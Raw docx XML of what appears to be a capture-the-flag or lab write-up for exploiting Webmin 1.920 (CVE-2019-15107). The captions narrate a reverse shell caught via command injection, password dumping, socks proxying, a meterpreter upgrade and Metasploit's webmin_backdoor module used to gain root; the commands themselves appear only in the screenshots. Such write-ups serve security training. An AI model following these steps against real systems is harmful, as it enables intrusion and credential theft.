      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="5727700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="13"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5943600" cy="57277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t xml:space="preserve">Below shows the connection between the netcat listener and web application</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000066">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1168400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="4" name="image14.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image14.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="11684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t xml:space="preserve">With the reverse shell commands are able to be ran which allow for the discovery of possible exploit options</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2527300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="14"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5943600" cy="25273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t xml:space="preserve">Below shows the ability of printing out user passwords which if obtained with the shadow file could lead to the exfiltration and decryption of the user passwords which could be used for later and further exploitation.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5086470" cy="3871913"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="1"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086470" cy="3871913"/>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t xml:space="preserve">Below shows that webmin version 1.920 is on target which in this case is the vector for exploitation.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000082">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="3652838" cy="2468584"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="10"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3652838" cy="2468584"/>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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploitation:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000085">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Below shows the setting up of a reverse shell using metasploit. This acts instead of the netcat listener from before. By reloading the web app page with 504 gateway time-out, the command that was used to connect to the netcat listener will run again and connect to the reverse shell in metasploit.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000086">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1625600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="2"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5943600" cy="162560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t xml:space="preserve">By using the same host address and port as the ones used by netcat and that are in the command inject on the web page the connection is then made, and the reverse shell is set to the background.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000089">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4562253" cy="4367213"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5"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4562253" cy="4367213"/>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t xml:space="preserve">With the reverse shell in the background the use of a socks proxy is needed. </w:t>
      </w:r>
      <w:hyperlink r:id="rId19">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://book.hacktricks.xyz/generic-methodologies-and-resources/tunneling-and-port-forwarding</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5362575" cy="1057275"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="8"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5362575" cy="1057275"/>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t xml:space="preserve">With the proxy running, its time to upgrade the reverse shell to a meterpreter session. To do so the LPORT is set to that of the reverse shell session, the session that was set to the background is selected  and the post exploit is ran.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000092">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3276600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="7"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59436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t xml:space="preserve">With the shell now upgraded to a meterpreter session the webmin_backdoor exploit is used with the options seen below.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2679700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="3" name="image12.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image12.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId22"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="59436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t xml:space="preserve">With the proper options for the exploit, it is now possible to run it. To make things smoother ReverseAllowProxy is set to true, AutoCheck is set to false, and ForceExploit is set to true. Once ran the revere shell payload is injected  and root privileges are obtained within the shell.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2006600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="12" name="image10.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image10.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId23"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2006600"/>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t xml:space="preserve">With root privileges, the root flag is obtainable.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="3105150" cy="342900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="11" name="image2.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image2.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId24"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="310515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ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="2d3b45"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:headerReference r:id="rId25"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Merriweather">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A">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pPr>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
      <w:shd w:fill="d9d9d9" w:val="clear"/>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22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId23"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infosecmatter.com/metasploit-module-library/?mm=exploit/linux/http/webmin_backdoor" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/cve-2019-15107" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15107" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/cncf/tag-security/blob/main/supply-chain-security/compromises/2019/webmin-backdoor.md" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://book.hacktricks.xyz/generic-methodologies-and-resources/tunneling-and-port-forwarding" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/></Relationships>
</file>

<file path=word/_rels/fontTable.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Merriweather-regular.ttf"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Merriweather-bold.ttf"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Merriweather-italic.ttf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Merriweather-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